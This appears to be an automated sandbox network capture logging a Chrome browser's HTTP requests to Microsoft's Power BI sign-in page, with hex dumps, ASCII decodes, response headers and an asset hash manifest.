                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors https://teams.powerbi.com 'self' https://res-sdf.cdn.office.net https://res.cdn.office.net https://mesh.public.onecdn.static.microsoft https://m365.cloud.microsoft https://outlook.cloud.microsoft https://teams.cloud.microsoft https://teams.microsoft.com https://gov.teams.microsoft.us https://dod.teams.microsoft.us https://outlook.office.com https://outlook-sdf.office.com https://outlook.office365.com https://outlook-sdf.office365.com https://www.office.com https://scuprodprv.www.office.com https://www.microsoft365.com https://local.loop.microsoft.com https://dev.loop.microsoft.com https://df.loop.microsoft.com https://loop.microsoft.com; report-uri /cspreport; media-src http: https: data:; frame-src blob: https: http: azuredatastudio:; worker-src 'self' blob:; img-src http: https: blob: data:; style-src data: blob: *.microsoft.com *.bing.com *.powerapps.com https://*.powerapps.com *.walkme.com use.fontawesome.com *.googleapis.com 'self' 'unsafe-inline' *.bootstrapcdn.c [TRUNCATED]
                                                                                                                                                                                                          2024-12-11 23:29:59 UTC2084INData Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 6f 77 65 72 20 42 49 20 53 69 67 6e 20 69 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 65 61 73 65 20 64 6f 20 6e 6f 74 20 61 64 64 20 61 6e 79 20 73 63 72 69 70 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 6c 69 6e 65 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 20 66 75 6e 63 74 69 6f 6e 20 63 64 6e 46 61 6c 6c 62 61 63 6b 28 65 76 65 6e 74 29 20 7b 76 61 72 20 64 61 74 65 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 20 76 61 72 20 66 61 69 6c 65 64 52 65 71 75 65 73 74 55 72 6c 20 3d
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <title>Power BI Sign in</title> ... Please do not add any script before this line --> <script> function cdnFallback(event) {var date = new Date(); var failedRequestUrl =
                                                                                                                                                                                                          2024-12-11 23:29:59 UTC4096INData Raw: 66 61 75 6c 74 53 69 67 6e 49 6e 2e 6d 69 6e 2e 61 35 66 34 38 61 31 35 31 35 33 34 38 36 35 38 32 64 63 36 2e 6a 73 22 20 20 6f 6e 65 72 72 6f 72 3d 63 64 6e 46 61 6c 6c 62 61 63 6b 28 65 76 65 6e 74 29 20 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 5b 27 44 65 66 61 75 6c 74 53 69 67 6e 49 6e 2e 6d 69 6e 2e 6a 73 27 5d 2e 65 6e 64 20 3d 20 44 61 74 65 2e 6e 6f 77 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 6c 75 73 74 65 72 55 72 69 20 3d 20 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 70 6f 77 65 72 62 69
                                                                                                                                                                                                          Data Ascii: faultSignIn.min.a5f48a15153486582dc6.js" onerror=cdnFallback(event) ></script><script type="text/javascript">this.parseTimeMarkers['DefaultSignIn.min.js'].end = Date.now();</script> <script> var clusterUri = "https://api.powerbi
                                                                                                                                                                                                          2024-12-11 23:29:59 UTC4096INData Raw: 6e 4d 6f 72 65 54 65 78 74 27 29 2e 63 73 73 28 22 6c 65 66 74 22 2c 20 65 2e 63 6c 69 65 6e 74 58 20 2b 20 27 70 78 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2e 70 6f 77 65 72 61 70 70 73 2e 63 6f 6d 2f 72 65 73 6f 75 72 63 65 2f 70 6f 77 65 72 62 69 77 66 65 2f 73 74 79 6c 65 73 2f 73 74 79 6c 65 4c 69 62 72 61 72 79 2e 6d 69 6e 2e 62 35 38 30 35 65 32 34 36 37 37 33 62 38 64 61 33 66 63 32 2e 63 73 73 22 20 6f 6e 65 72 72 6f 72 3d 63 64 6e 46 61 6c 6c 62 61 63 6b 28 65 76 65 6e 74 29 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65
                                                                                                                                                                                                          Data Ascii: nMoreText').css("left", e.clientX + 'px'); } </script> <link rel="stylesheet" href="https://content.powerapps.com/resource/powerbiwfe/styles/styleLibrary.min.b5805e246773b8da3fc2.css" onerror=cdnFallback(event) /><link re
                                                                                                                                                                                                          2024-12-11 23:29:59 UTC1812INData Raw: 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 20 3d 20 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 20 7c 7c 20 7b 7d 3b 20 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 5b 27 68 61 73 68 2d 6d 61 6e 69 66 65 73 74 2e 6a 73 27 5d 20 3d 20 7b 20 6e 6f 6d 69 6e 61 6c 53 74 61 72 74 3a 20 44 61 74 65 2e 6e 6f 77 28 29 2c 20 73 74 61 72 74 3a 20 44 61 74 65 2e 6e 6f 77 28 29 2c 20 69 6e 69 74 69 61 6c 3a 20 74 72 75 65 20 7d 3b 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 31 33 2e 30 2e 32 34 37 36 36 2e 33 39 2f 73 63 72 69 70 74 73 2f 68 61 73 68 2d 6d
                                                                                                                                                                                                          Data Ascii: e="text/javascript">this.parseTimeMarkers = this.parseTimeMarkers || {}; this.parseTimeMarkers['hash-manifest.js'] = { nominalStart: Date.now(), start: Date.now(), initial: true }; </script><script type="text/javascript" src="13.0.24766.39/scripts/hash-m
                                                                                                                                                                                                          2024-12-11 23:29:59 UTC4096INData Raw: 2c 7b 20 70 75 72 70 6f 73 65 3a 20 22 43 75 73 74 6f 6d 65 72 41 63 74 69 6f 6e 22 2c 20 73 61 6d 70 6c 65 52 61 74 65 3a 20 31 20 7d 2c 7b 20 70 75 72 70 6f 73 65 3a 20 22 56 65 72 62 6f 73 65 22 2c 20 73 61 6d 70 6c 65 52 61 74 65 3a 20 31 20 7d 5d 20 7d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 6c 65 6d 65 74 72 79 53 65 73 73 69 6f 6e 49 64 20 3d 20 20 22 30 65 61 39 30 32 64 65 2d 38 35 62 65 2d 34 64 35 30 2d 38 38 61 32 2d 65 37 63 39 37 37 34 34 35 65 37 34 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 61 6c 6c 6f 77 54 65 6c 65 6d 65 74 72 79 20 3d 20 74 72 75 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 61 70 70 49 6e 73 69 67 68 74 73 56 32 49 6e 73 74 72 4b 65 79 20 3d 20 22 39 30 38 62 32 30
                                                                                                                                                                                                          Data Ascii: ,{ purpose: "CustomerAction", sampleRate: 1 },{ purpose: "Verbose", sampleRate: 1 }] }; var telemetrySessionId = "0ea902de-85be-4d50-88a2-e7c977445e74"; var allowTelemetry = true; var appInsightsV2InstrKey = "908b20
                                                                                                                                                                                                          2024-12-11 23:29:59 UTC724INData Raw: 20 63 6f 6e 64 69 74 69 6f 6e 73 3c 2f 61 3e 20 61 6e 64 20 61 6c 6c 6f 77 20 50 6f 77 65 72 20 42 49 20 74 6f 20 67 65 74 20 79 6f 75 72 20 75 73 65 72 20 61 6e 64 20 74 65 6e 61 6e 74 20 64 65 74 61 69 6c 73 2e 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 44 3d 35 32 31 38 33 39 26 63 6c 63 69 64 3d 30 78 34 30 39 27 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 3e 4d 69 63 72 6f 73 6f 66 74 20 50 72 69 76 61 63 79 20 53 74 61 74 65 6d 65 6e 74 3c 2f 61 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d
                                                                                                                                                                                                          Data Ascii: conditions</a> and allow Power BI to get your user and tenant details. <a href='https://go.microsoft.com/fwlink/?LinkID=521839&clcid=0x409' target='_blank'>Microsoft Privacy Statement</a> </div> </div>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          33192.168.2.44999020.38.136.704431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:30:01 UTC960OUTGET /13.0.24766.39/scripts/hash-manifest.js HTTP/1.1
                                                                                                                                                                                                          Host: app.powerbi.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                          Referer: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          Cookie: ASP.NET_SessionId=d4pjdp40z2qspls5d0ihxuuc; WFESessionId=0ea902de-85be-4d50-88a2-e7c977445e74; EnableCSP=PROD; ARRAffinity=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ARRAffinitySameSite=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560
                                                                                                                                                                                                          2024-12-11 23:30:01 UTC1852INHTTP/1.1 200 OK
                                                                                                                                                                                                          Content-Length: 953770
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:30:01 GMT
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Access-Control-Allow-Origin: https://teams.powerbi.com
                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                          ETag: "0e7f6f18248db1:0"
                                                                                                                                                                                                          Last-Modified: Sat, 07 Dec 2024 08:35:18 GMT
                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors https://teams.powerbi.com 'self' https://res-sdf.cdn.office.net https://res.cdn.office.net https://mesh.public.onecdn.static.microsoft https://m365.cloud.microsoft https://outlook.cloud.microsoft https://teams.cloud.microsoft https://teams.microsoft.com https://gov.teams.microsoft.us https://dod.teams.microsoft.us https://outlook.office.com https://outlook-sdf.office.com https://outlook.office365.com https://outlook-sdf.office365.com https://www.office.com https://scuprodprv.www.office.com https://www.microsoft365.com https://local.loop.microsoft.com https://dev.loop.microsoft.com https://df.loop.microsoft.com https://loop.microsoft.com; report-uri /cspreport; media-src http: https: data:; frame-src blob: https: http: azuredatastudio:; worker-src 'self' blob:; img-src http: https: blob: data:; style-src data: blob: *.microsoft.com *.bing.com *.powerapps.com https://*.powerapps.com *.walkme.com use.fontawesome.com *.googleapis.com 'self' 'unsafe-inline' *.bootstrapcdn.c [TRUNCATED]
                                                                                                                                                                                                          2024-12-11 23:30:01 UTC780INData Raw: 76 61 72 20 68 61 73 68 4d 61 70 70 69 6e 67 73 20 3d 20 7b 22 65 78 74 65 72 6e 61 6c 73 2f 63 72 6f 70 70 65 72 2e 6d 69 6e 2e 6a 73 22 3a 22 65 78 74 65 72 6e 61 6c 73 2f 63 72 6f 70 70 65 72 2e 6d 69 6e 2e 39 61 63 30 37 37 31 62 61 61 33 31 34 39 34 62 66 65 30 36 2e 6a 73 22 2c 22 65 78 74 65 72 6e 61 6c 73 2f 63 72 6f 70 70 65 72 2e 6d 69 6e 2e 63 73 73 22 3a 22 65 78 74 65 72 6e 61 6c 73 2f 63 72 6f 70 70 65 72 2e 6d 69 6e 2e 31 37 64 36 31 38 61 38 61 63 33 38 35 32 61 31 64 64 35 32 2e 63 73 73 22 2c 22 65 78 74 65 72 6e 61 6c 73 2f 63 72 6f 70 70 65 72 2e 72 74 6c 2e 6d 69 6e 2e 63 73 73 22 3a 22 65 78 74 65 72 6e 61 6c 73 2f 63 72 6f 70 70 65 72 2e 72 74 6c 2e 6d 69 6e 2e 31 37 64 36 31 38 61 38 61 63 33 38 35 32 61 31 64 64 35 32 2e 63 73 73
                                                                                                                                                                                                          Data Ascii: var hashMappings = {"externals/cropper.min.js":"externals/cropper.min.9ac0771baa31494bfe06.js","externals/cropper.min.css":"externals/cropper.min.17d618a8ac3852a1dd52.css","externals/cropper.rtl.min.css":"externals/cropper.rtl.min.17d618a8ac3852a1dd52.css
                                                                                                                                                                                                          2024-12-11 23:30:01 UTC4096INData Raw: 73 22 3a 22 65 78 74 65 72 6e 61 6c 73 2f 6a 71 75 65 72 79 2d 73 63 72 6f 6c 6c 62 61 72 2e 6d 69 6e 2e 65 34 39 65 65 33 35 62 36 30 35 66 62 62 39 64 31 61 66 35 2e 6a 73 22 2c 22 65 78 74 65 72 6e 61 6c 73 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 22 3a 22 65 78 74 65 72 6e 61 6c 73 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 30 32 64 65 37 31 36 35 30 39 32 36 34 34 36 33 34 65 37 31 2e 6a 73 22 2c 22 65 78 74 65 72 6e 61 6c 73 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 63 73 73 22 3a 22 65 78 74 65 72 6e 61 6c 73 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 36 30 62 32 66 63 32 62 63 30 34 32 66 63 36 38 33 31 64 62 2e 63 73 73 22 2c 22 65 78 74 65 72 6e 61 6c 73 2f 6a 71 75 65 72 79 2d 75 69 2e 72 74 6c 2e 6d 69 6e 2e 63 73 73 22 3a 22
                                                                                                                                                                                                          Data Ascii: s":"externals/jquery-scrollbar.min.e49ee35b605fbb9d1af5.js","externals/jquery-ui.min.js":"externals/jquery-ui.min.02de7165092644634e71.js","externals/jquery-ui.min.css":"externals/jquery-ui.min.60b2fc2bc042fc6831db.css","externals/jquery-ui.rtl.min.css":"
                                                                                                                                                                                                          2024-12-11 23:30:01 UTC4096INData Raw: 65 38 2e 65 6f 74 22 2c 22 66 6f 6e 74 73 2f 53 74 61 6e 64 61 72 64 46 6f 6e 74 2e 77 6f 66 66 22 3a 22 66 6f 6e 74 73 2f 53 74 61 6e 64 61 72 64 46 6f 6e 74 2e 63 33 33 32 65 64 39 35 38 65 33 63 30 63 33 33 31 65 36 39 2e 77 6f 66 66 22 2c 22 66 6f 6e 74 73 2f 53 74 61 6e 64 61 72 64 46 6f 6e 74 42 6f 6c 64 2e 77 6f 66 66 22 3a 22 66 6f 6e 74 73 2f 53 74 61 6e 64 61 72 64 46 6f 6e 74 42 6f 6c 64 2e 65 63 36 32 30 36 31 39 33 31 34 63 64 65 31 66 65 38 62 36 2e 77 6f 66 66 22 2c 22 66 6f 6e 74 73 2f 53 74 61 6e 64 61 72 64 46 6f 6e 74 42 6f 6c 64 2e 74 74 66 22 3a 22 66 6f 6e 74 73 2f 53 74 61 6e 64 61 72 64 46 6f 6e 74 42 6f 6c 64 2e 64 39 39 36 65 32 36 64 62 61 31 62 62 33 65 31 65 32 36 61 2e 74 74 66 22 2c 22 66 6f 6e 74 73 2f 53 74 61 6e 64 61 72
                                                                                                                                                                                                          Data Ascii: e8.eot","fonts/StandardFont.woff":"fonts/StandardFont.c332ed958e3c0c331e69.woff","fonts/StandardFontBold.woff":"fonts/StandardFontBold.ec620619314cde1fe8b6.woff","fonts/StandardFontBold.ttf":"fonts/StandardFontBold.d996e26dba1bb3e1e26a.ttf","fonts/Standar
                                                                                                                                                                                                          2024-12-11 23:30:01 UTC4096INData Raw: 72 74 6c 2e 6d 69 6e 2e 39 35 36 38 33 35 37 30 61 32 39 64 38 65 31 64 37 30 30 63 2e 63 73 73 22 2c 22 73 74 79 6c 65 73 2f 69 74 65 6d 45 6d 62 65 64 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f 69 74 65 6d 45 6d 62 65 64 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 64 35 34 62 33 36 63 33 36 64 62 36 33 32 36 61 65 64 37 35 2e 63 73 73 22 2c 22 73 74 79 6c 65 73 2f 69 74 65 6d 45 6d 62 65 64 2e 62 75 6e 64 6c 65 2e 72 74 6c 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f 69 74 65 6d 45 6d 62 65 64 2e 62 75 6e 64 6c 65 2e 72 74 6c 2e 6d 69 6e 2e 66 63 37 34 39 30 38 38 35 38 37 33 37 35 31 37 37 39 39 62 2e 63 73 73 22 2c 22 73 74 79 6c 65 73 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f
                                                                                                                                                                                                          Data Ascii: rtl.min.95683570a29d8e1d700c.css","styles/itemEmbed.bundle.min.css":"styles/itemEmbed.bundle.min.d54b36c36db6326aed75.css","styles/itemEmbed.bundle.rtl.min.css":"styles/itemEmbed.bundle.rtl.min.fc74908858737517799b.css","styles/jquery-ui.min.css":"styles/
                                                                                                                                                                                                          2024-12-11 23:30:01 UTC4096INData Raw: 6c 65 73 2f 71 75 69 63 6b 63 72 65 61 74 65 2e 62 75 6e 64 6c 65 2e 72 74 6c 2e 6d 69 6e 2e 62 61 66 63 39 31 35 31 35 66 65 39 39 63 62 39 30 35 64 66 2e 63 73 73 22 2c 22 73 74 79 6c 65 73 2f 71 75 69 63 6b 63 72 65 61 74 65 2e 6d 61 74 65 72 69 61 6c 2d 74 68 65 6d 65 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f 71 75 69 63 6b 63 72 65 61 74 65 2e 6d 61 74 65 72 69 61 6c 2d 74 68 65 6d 65 2e 6d 69 6e 2e 36 64 39 64 63 63 31 34 61 63 65 36 62 61 34 63 34 36 34 61 2e 63 73 73 22 2c 22 73 74 79 6c 65 73 2f 71 75 69 63 6b 43 72 65 61 74 65 2e 6d 69 6e 2e 63 73 73 22 3a 22 73 74 79 6c 65 73 2f 71 75 69 63 6b 43 72 65 61 74 65 2e 6d 69 6e 2e 36 61 36 33 63 34 66 33 33 65 38 37 66 62 62 31 36 31 64 64 2e 63 73 73 22 2c 22 73 74 79 6c 65 73 2f 71 75
                                                                                                                                                                                                          Data Ascii: les/quickcreate.bundle.rtl.min.bafc91515fe99cb905df.css","styles/quickcreate.material-theme.min.css":"styles/quickcreate.material-theme.min.6d9dcc14ace6ba4c464a.css","styles/quickCreate.min.css":"styles/quickCreate.min.6a63c4f33e87fbb161dd.css","styles/qu
                                                                                                                                                                                                          2024-12-11 23:30:01 UTC4096INData Raw: 36 33 31 63 35 66 32 66 66 65 36 38 33 64 39 2e 63 73 73 22 2c 22 69 6d 61 67 65 73 2f 32 31 56 69 61 6e 65 74 2e 73 76 67 22 3a 22 69 6d 61 67 65 73 2f 32 31 56 69 61 6e 65 74 2e 63 63 37 61 38 34 33 65 64 37 33 64 64 32 39 66 36 65 64 36 2e 73 76 67 22 2c 22 69 6d 61 67 65 73 2f 61 61 73 2d 74 6f 2d 70 62 69 2d 70 72 65 6d 69 75 6d 2d 6d 69 67 72 61 74 69 6f 6e 2e 73 76 67 22 3a 22 69 6d 61 67 65 73 2f 61 61 73 2d 74 6f 2d 70 62 69 2d 70 72 65 6d 69 75 6d 2d 6d 69 67 72 61 74 69 6f 6e 2e 64 35 38 35 62 64 63 61 37 34 38 65 65 30 63 34 64 38 66 36 2e 73 76 67 22 2c 22 69 6d 61 67 65 73 2f 41 63 75 6d 61 74 69 63 61 5f 74 69 6c 65 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 41 63 75 6d 61 74 69 63 61 5f 74 69 6c 65 2e 66 38 62 34 66 31 32 61 65 61 39 38 35
                                                                                                                                                                                                          Data Ascii: 631c5f2ffe683d9.css","images/21Vianet.svg":"images/21Vianet.cc7a843ed73dd29f6ed6.svg","images/aas-to-pbi-premium-migration.svg":"images/aas-to-pbi-premium-migration.d585bdca748ee0c4d8f6.svg","images/Acumatica_tile.png":"images/Acumatica_tile.f8b4f12aea985
                                                                                                                                                                                                          2024-12-11 23:30:02 UTC4096INData Raw: 67 65 73 2f 42 61 63 6b 67 72 6f 75 6e 64 31 33 52 6f 75 6e 64 65 64 2e 65 30 35 39 38 33 35 65 65 65 32 31 39 30 32 62 38 30 63 66 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 62 61 63 6b 67 72 6f 75 6e 64 31 33 54 68 75 6d 62 6e 61 69 6c 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 62 61 63 6b 67 72 6f 75 6e 64 31 33 54 68 75 6d 62 6e 61 69 6c 2e 32 39 66 66 38 39 33 32 34 65 34 62 64 31 35 38 38 66 35 64 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 62 61 63 6b 67 72 6f 75 6e 64 31 34 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 62 61 63 6b 67 72 6f 75 6e 64 31 34 2e 62 36 65 36 35 66 37 39 36 63 35 32 37 37 35 33 63 32 64 31 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 42 61 63 6b 67 72 6f 75 6e 64 31 34 52 6f 75 6e 64 65 64 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f
                                                                                                                                                                                                          Data Ascii: ges/Background13Rounded.e059835eee21902b80cf.png","images/background13Thumbnail.png":"images/background13Thumbnail.29ff89324e4bd1588f5d.png","images/background14.png":"images/background14.b6e65f796c527753c2d1.png","images/Background14Rounded.png":"images/
                                                                                                                                                                                                          2024-12-11 23:30:02 UTC4096INData Raw: 67 65 73 2f 62 69 67 5f 63 6c 69 70 62 6f 61 72 64 2e 38 31 63 61 38 36 37 62 36 61 63 30 36 64 63 63 66 64 64 63 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 62 69 67 5f 64 72 75 6d 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 62 69 67 5f 64 72 75 6d 2e 33 35 66 62 32 64 63 38 66 32 61 63 35 30 33 35 61 31 62 34 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 62 69 67 5f 67 72 61 64 75 61 74 69 6f 6e 5f 68 61 74 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 62 69 67 5f 67 72 61 64 75 61 74 69 6f 6e 5f 68 61 74 2e 37 38 32 37 66 38 61 37 65 33 34 38 32 63 65 32 33 30 39 66 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 62 69 6e 67 4e 65 77 73 5f 74 69 6c 65 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 62 69 6e 67 4e 65 77 73 5f 74 69 6c 65 2e 64 39 64 62 66 30 30 61 63 65 66 66
                                                                                                                                                                                                          Data Ascii: ges/big_clipboard.81ca867b6ac06dccfddc.png","images/big_drum.png":"images/big_drum.35fb2dc8f2ac5035a1b4.png","images/big_graduation_hat.png":"images/big_graduation_hat.7827f8a7e3482ce2309f.png","images/bingNews_tile.png":"images/bingNews_tile.d9dbf00aceff
                                                                                                                                                                                                          2024-12-11 23:30:02 UTC4096INData Raw: 6e 64 2d 62 69 6c 6c 69 6e 67 2e 37 64 33 30 65 64 34 39 33 35 64 62 37 32 37 63 63 37 38 63 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 62 69 6e 67 2d 61 64 73 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 62 69 6e 67 2d 61 64 73 2e 37 30 64 61 36 39 33 30 34 66 37 35 39 62 62 32 63 33 32 39 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 62 69 6e 67 2d 73 6f 63 69 61 6c 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 62 69 6e 67 2d 73 6f 63 69 61 6c 2e 34 34 64 35 39 38 65 35 35 33 30 39 31 39 39 37 63 30 62 30 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e
                                                                                                                                                                                                          Data Ascii: nd-billing.7d30ed4935db727cc78c.png","images/content-provider-bing-ads.png":"images/content-provider-bing-ads.70da69304f759bb2c329.png","images/content-provider-bing-social.png":"images/content-provider-bing-social.44d598e553091997c0b0.png","images/conten
                                                                                                                                                                                                          2024-12-11 23:30:02 UTC4096INData Raw: 39 39 33 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 73 61 6c 65 73 66 6f 72 63 65 2d 73 6d 61 6c 6c 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 73 61 6c 65 73 66 6f 72 63 65 2d 73 6d 61 6c 6c 2e 36 30 39 66 63 64 33 37 65 32 39 38 37 39 33 39 31 38 38 31 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 73 61 6c 65 73 66 6f 72 63 65 2e 70 6e 67 22 3a 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 73 61 6c 65 73 66 6f 72 63 65 2e 31 61 62 31 30 66 32 62 64 66 39 66 35 64 64 38 31 32 66 61 2e 70 6e 67 22 2c 22 69 6d 61 67 65 73 2f 63 6f 6e 74 65 6e 74 2d 70 72 6f 76 69 64 65 72 2d 73 65 6e
                                                                                                                                                                                                          Data Ascii: 993.png","images/content-provider-salesforce-small.png":"images/content-provider-salesforce-small.609fcd37e29879391881.png","images/content-provider-salesforce.png":"images/content-provider-salesforce.1ab10f2bdf9f5dd812fa.png","images/content-provider-sen


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          34192.168.2.45001620.38.136.704431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:30:05 UTC549OUTGET /13.0.24766.39/scripts/hash-manifest.js HTTP/1.1
                                                                                                                                                                                                          Host: app.powerbi.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
